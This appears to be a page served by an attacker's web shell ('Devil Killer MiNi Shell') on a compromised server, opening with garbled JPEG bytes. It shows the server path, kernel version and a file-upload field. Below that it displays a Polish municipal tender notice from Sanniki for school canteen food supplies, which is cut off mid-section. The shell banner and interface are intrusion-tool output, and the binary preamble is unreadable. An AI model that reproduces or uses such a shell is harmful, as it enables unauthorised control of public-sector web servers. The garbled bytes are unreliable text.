JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20240116/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20240116/0004106901-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Zakup i dostawa artykułów spożywczych do stołówki Szkoły Podstawowej<br/>im. Fryderyka Chopina w Sannikach i Przedszkola Samorządowego <br/>w Sannikach w roku szkolnym 2023/2024 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Miasto i Gmina Sanniki</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 611015916</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Warszawska 169</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Sanniki</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">09-540</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL923 - Płocki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">24 277 78 10</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">24 277 78 15</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@sanniki.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.sanniki.bip.org.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zakup i dostawa artykułów spożywczych do stołówki Szkoły Podstawowej<br/>im. Fryderyka Chopina w Sannikach i Przedszkola Samorządowego <br/>w Sannikach w roku szkolnym 2023/2024 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-fe1022b2-b444-11ee-a66a-5e0e9a75a9a0</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00041069</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-01-16</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-fe1022b2-b444-11ee-a66a-5e0e9a75a9a0 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">. W postępowaniu o udzielenie zamówienia publicznego komunikacja między<br/>Zamawiającym a Wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem:<br/>https://ezamowienia.gov.pl.<br/>2. Korzystanie z Platformy e-Zamówienia jest bezpłatne.<br/>3. Adres strony internetowej prowadzonego postępowania: https://ezamowienia.gov.pl/mp-client/tenders/ocds-148610-fe1022b2-b444-11ee-a66a-5e0e9a75a9a0<br/>Postępowanie można wyszukać również ze strony głównej Platformy e-Zamówienia (przycisk „ Przeglądaj postępowania/konkursy”).<br/>4. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu<br/>„Wykonawca” na Platformie e-Zamówienia.<br/>5. Komunikacja w postępowaniu, z wyłączeniem składania ofert/wniosków o dopuszczenie do udziału w postępowaniu, odbywa się<br/>drogą elektroniczną za pośrednictwem formularzy do komunikacji dostępnych w zakładce „Formularze” ( „Formularze do<br/>komunikacji”). Pozostałe informacje w SWZ.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Komunikacja w postępowaniu, z<br/>wyłączeniem składania ofert odbywa się drogą elektroniczną za pośrednictwem formularzy do komunikacji dostępnych w zakładce<br/>„Formularze” („Formularze do komunikacji”). Za pośrednictwem „Formularzy do komunikacji” odbywa się w szczególności<br/>przekazywanie wezwań i zawiadomień, zadawanie pytań i udzielanie odpowiedzi. Formularze do komunikacji umożliwiają również<br/>dołączenie załącznika do przesyłanej wiadomości (przycisk „dodaj załącznik”).<br/>2. Możliwość korzystania w postępowaniu z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta „Wykonawcy”<br/>na Platformie e-Zamówienia oraz zalogowania się na Platformie e-Zamówienia. Do korzystania z „Formularzy do komunikacji”<br/>służących do zadawania pytań dotyczących treści SWZ wystarczające jest posiadanie tzw. konta uproszczonego na Platformie<br/>eZamówienia.<br/>3. Wszystkie wysłane i odebrane w postępowaniu przez wykonawcę wiadomości widoczne są po zalogowaniu w podglądzie<br/>postępowania w zakładce „Komunikacja”.<br/>4. Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB (wielkość ta dotyczy<br/>plików przesyłanych jako załączniki do jednego formularza).<br/>5. Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz<br/>informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia.<br/>6. W przypadku problemów technicznych i awarii związanych z funkcjonowaniem Platformy e-Zamówienia użytkownicy mogą<br/>skorzystać ze wsparcia technicznego dostępnego pod numerem telefonu infolinii platformy 22 458 77 99 lub drogą elektroniczną<br/>poprzez formularz udostępniony na stronie internetowej https://ezamowienia.gov.pl w zakładce „Zgłoś problem”.<br/>7. W uzasadnionych przypadkach uniemożliwiających komunikację wykonawcy i Zamawiającego za pośrednictwem Platformy<br/>eZamówienia, Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej na adres e-mail sekretariat@sanniki.pl (nie<br/>dotyczy składania ofert). Pozostałe informacje w SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Miasto i Gmina Sanniki, zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego<br/>i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016,str. 1), dalej „RODO”, informuje, że:<br/>1. Administratorem Pani/Pana danych osobowych jest Miasto i Gmina Sanniki<br/> z siedzibą: ul. Warszawska 169,09-540 Sanniki, tel. 24 277 68 51, e-mail: sekretariat@sanniki.pl, <br/>2. Inspektorem ochrony danych osobowych w Urzędzie Miasta i Gminy Sanniki jest Paweł Modrzejewski. Kontakt z Inspektorem Ochrony Danych Osobowych: inspektor@kiodo.pl,<br/>3. Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego pn. „Zakup i dostawa artykułów spożywczych do stołówki Szkoły Podstawowej im. Fryderyka Chopina w Sannikach i Przedszkola Samorządowego w Sannikach w roku szkolnym 2023/2024”<br/>4. Odbiorcami danych osobowych są lub mogą zostać: podmioty, którym na podstawie umowy powierzono przetwarzanie danych osobowych, operatorzy pocztowi i firmy kurierskie, banki organy administracji publicznej w tym inne jednostki samorządu terytorialnego lub urzędy państwowe w zakresie, w jakim będzie to wynikać z przepisów prawa zobowiązujących do udostępnienia tych danych, podmioty, którym Administrator ma obowiązek przekazać dane na podstawie obowiązujących przepisów prawa - min. w oparciu o art.18 oraz art. 74 ustawy z dnia 11 września 2019r. (t.j.Dz. U. 2022 poz. 1710 z późn. zm.) Prawo Zamówień publicznych.<br/>5. Pani/Pana dane osobowe będą przechowywane, przez okres 5 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 5 lat, okres przechowywania obejmuje cały czas trwania umowy, nie dłużej jednak niż lat 15;<br/>6. Podanie danych osobowych w związku z udziałem w postępowaniu o udzielenie zamówienia publicznego nie jest obowiązkowe, ale może być warunkiem niezbędnym do wzięcia w nim udziału, a następnie wykonywania umowy. W przypadku nie podania danych Zamawiający może odrzucić ofertę.<br/>7. Posiada Pani/Pan:<br/>• na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>• na podstawie art. 16 RODO prawo do sprostowania lub uzupełnienia Pani/Pana danych osobowych z tym zastrzeżeniem, że sprostowanie lub uzupełnienie nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego lub postanowień umowy <br/>w zakresie niezgodnym z ustawą PZP*;<br/>• na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO **;<br/>• prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>______________________<br/>15<br/>* Wyjaśnienie: skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników.<br/>** Wyjaśnienie: prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do<br/>przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DG.271.1.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">7</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest dostawa produktów wędliniarskich i drobiu. Przewidywane zapotrzebowanie miesięczne na ww. artykuły wynosi:<br/>Lp.	Nazwa produktu	zapotrzebowanie na m-c	jednostki<br/>1	schab bez kości w klasie I bez tłuszczu zewnętrznego	29	kg<br/>2	schab z kością w klasie I bez tłuszczu zewnętrznego	10	kg<br/>3	boczek wędzony, parzony 10	kg<br/>4	łopatka z kością w klasie I	15	kg<br/>5	łopatka bez kości w klasie I	25	kg<br/>6	żeberka wieprzowe w klasie I	53	kg<br/>7	wołowina rosołowa, w klasie I	4	kg<br/>8	golonka tylna w klasie I	2	kg<br/>9	mięso mielone z łopatki, min. 88% mięsa wieprzowego	20	kg<br/>10	mięso na gulasz w klasie I bez tłuszczu	12	kg<br/>11	boczek surowy w klasie I	2	kg<br/>12	wołowina bez kości w klasie I	7	kg<br/>13	polędwica sopocka, produkt wieprzowy, wędzony, parzony, mięso wieprzowe nie mniej niż 75%	3	kg<br/>14	kiełbasa podwawelska, produkt wieprzowo-wołowy, średnio rozdrobniony, wędzony, parzony, mięso wieprzowe nie mniej niż 77%, mieso wołowe nie mniej niż 8%	10	kg<br/>15	kiełbasa biała surowa w klasie I	17	kg<br/>16	kiełbasa śląska, produkt wieprzowy, średnio rozdrobniony, wędzony, parzony, mięsa wieprzowego nie mniej niż 75%	2	kg<br/>17	szynka w klasie I	2	kg<br/>18	polędwiczki wieprzowe klasa I	12	kg<br/>19	karkówka wieprzowa klasa I	12	kg<br/>20	szynka swojska wieprzowa, mięso wędzone, parzone min. 95% mięsa z szynki	1	kg<br/>21	polędwica z warzywami z mięsa drobiowo-wieprzowego i warzyw, min. 26% mięsa z kurczaka 2	kg<br/>22	kiełbasa krakowska, mięso wieprzowe grubo rozdrobnione, parzone, wędzone, miesa wieprzowego min. 89%	1	kg<br/>23	kiełbasa szynkowa wieprzowa, grubo rozdrobniona z dodatkiem mięsa szynki min. 37%	2	kg<br/>24	szynka wieprzowa gotowana, min. 57% mięsa z szynki	3	kg<br/>25	kiełbasa golonkowa, parzona, wędzona, gruborozdrobiona, min. 20% mięsa z golonki	2	kg<br/>26	szynka konserwowa wieprzowa,min. 65% mięsa wieprzowego	2	kg<br/>27	parówki delikatesowe wieprzowe w osłonce niejadalnej, min. 71% mięsa wieprzowego	8	kg<br/>28	wątróbka drobiowa klasa I	8	kg<br/>29	szynka z indyka, produkt parzony, zawartość mięsa z indyka min. 90%	12	kg<br/>30	udziec z kurczaka klasa I	45	kg<br/>31	porcje rosołowe klasa I	107	kg<br/>32	skrzydełka z kurczaka klasa I	30	kg<br/>33	filet z kurczaka, bez kości i skóry klasa I	42	kg<br/>34	podudzie z kurczaka klasa I	40	kg<br/>35	mięso mielone z pierści indyka, min. 95% mięsa z piersi indyka	4	szt<br/>36	filet z kurczaka faszerowany indyk z dodatkiem suszonych warzyw, min. 45% filetu z kurczaka i min. 10% filetu z indyka	2	kg<br/>37	pierś z kurczaka gotowana, min. 75% mięsa z kurczaka	3	kg<br/>38	pasztet drobiowy w puszce 155g zawartość surowców z kurczaka, min. 38%	6	szt<br/>39	filet z indyka w klasi I	12	kg<br/>40	polędwica z warzywami z mięsa drobiowego, min. 26 % mięsa z kurczaka	3	kg </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15100000-9 - Produkty zwierzęce, mięso i produkty mięsne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami i ich wagami:<br/><br/>Nazwa kryterium: cena za wykonanie danej części zamówienia	<br/>Waga100 %<br/><br/>Komisja przetargowa dokona oceny ofert w oparciu o kryterium zawarte w SWZ, przyznając każdej ofercie od 0 do 100 pkt.<br/>Oferta z najniższą ceną otrzyma 100 pkt, a pozostałe oferty otrzymają ilość punktów wyliczoną wg poniższej formuły:<br/> Cmin<br/> Yn = __________ x 100 pkt.<br/> Cn<br/>Gdzie:<br/>Yn - ilość punktów przyznanych ocenianej ofercie,<br/>Cmin	- najniższa cena ofertowa zaoferowana w ważnej ofercie za wykonanie danej części zamówienia,<br/>Cn - cena ofertowa ocenianej oferty za wykonanie danej części zamówienia</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest dostawa mleka i produktów mlecznych. Przewidywane zapotrzebowanie miesięczne na ww. artykuły wynosi:Lp.	Nazwa produktu	zapotrzebowanie na m-c	jednostki<br/>1	ser biały – półtłusty	45	kg<br/>2	mleko UHT 3,2 % 1 litr	20	litr<br/>3	mleko świeże w butelce 3,2 % 1 litr	180	litr<br/>4	śmietana 30% (0,5l)	81	szt.<br/>5	masło śmietankowe kostka 200g, zawartośc tłuszczu min.82%	138	szt.<br/>6	serek waniliowy o pojemności od 140-150 g bez syropu glukozowo--fruktozowego, maksymalnie 10g cukru w produkcie	60	szt.<br/>7	serek twarogowy typu almette o pojemności 125-135g	6	szt<br/>8	twarożek odtłuszczony, puszysty, opakowanie min. 90 g	5	szt.<br/>9	ser żółty Gouda niedopuszczalny wyrób seropodobny, podpuszczkowy, dojrzewający z mleka pasteryzowanego o zawartości tłuszczu niewiększej niż 27g/100g produktu	5	kg<br/>10	jogurt naturalny z owocami o pojemności od 120-150g bez syropu glukozowo-fruktozowego maksymalnie 10g cukru	20	szt.<br/>11	jogurt naturalny typu greckiego opakowanie o pojemności 400g, zawartość tłuszczu 2-2,5%	28	szt.<br/>12	jogurt naturalny typu greckiego o smaku waniliowym,opakowanie o pojemności 120g	10	szt.<br/>13	deser o smaku truskawkowym z mleka, min. 33% mleka odtłuszczonego, opakowanie 115 g	10	szt.<br/>14	masło roślinne w kubku 250 g	37	szt.<br/>15	śmietana 18% 400g 40	szt<br/>16	serek topiony 100g 13	szt.<br/>17	serek feta 270 g	10	szt.<br/>18	ser mascarpone 250 g	2	szt.<br/>19	maślanka owocowa 1 litr	8	szt<br/>20	serek homogenizowany waniliowy 180g 20	szt<br/>21	mleczko kokosowe puszka 400 g 1	szt. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15500000-3 - Produkty mleczarskie</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami i ich wagami:<br/><br/>Nazwa kryterium: cena za wykonanie danej części zamówienia	<br/>Waga100 %<br/><br/>Komisja przetargowa dokona oceny ofert w oparciu o kryterium zawarte w SWZ, przyznając każdej ofercie od 0 do 100 pkt.<br/>Oferta z najniższą ceną otrzyma 100 pkt, a pozostałe oferty otrzymają ilość punktów wyliczoną wg poniższej formuły:<br/> Cmin<br/> Yn = __________ x 100 pkt.<br/> Cn<br/>Gdzie:<br/>Yn - ilość punktów przyznanych ocenianej ofercie,<br/>Cmin	- najniższa cena ofertowa zaoferowana w ważnej ofercie za wykonanie danej części zamówienia,<br/>Cn - cena ofertowa ocenianej oferty za wykonanie danej części zamówienia</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest dostawa owoców i przetworów owocowych. Przewidywane zapotrzebowanie miesięczne na ww. artykuły wynosi:<br/>1) jabłka	40	kg<br/>2) cytryny	12	kg<br/>3) banany	47	kg<br/>4) dżem truskawkowy, brzoskiwniowy, wiśniowy niemniej niż 80% owoców w dżemie, słoik 280g 50	szt.<br/>5) syrop owocowy 400 ml	36	szt<br/>6) mandarynki	12	kg<br/>7) gruszki	8	kg<br/>8) winogrono	4	kg<br/>9) kiwi	30	szt<br/>10) arbuz	6	kg<br/>11) truskawki mrożone 450g 38	szt.<br/>12) wiśnie mrożone 450g 33	szt.<br/>13) czarna porzeczka mrożona 450g 9	szt.<br/>14) lody w kubku 220 ml 15	szt. </p> <h3 class="mb-0">4.2.6.) 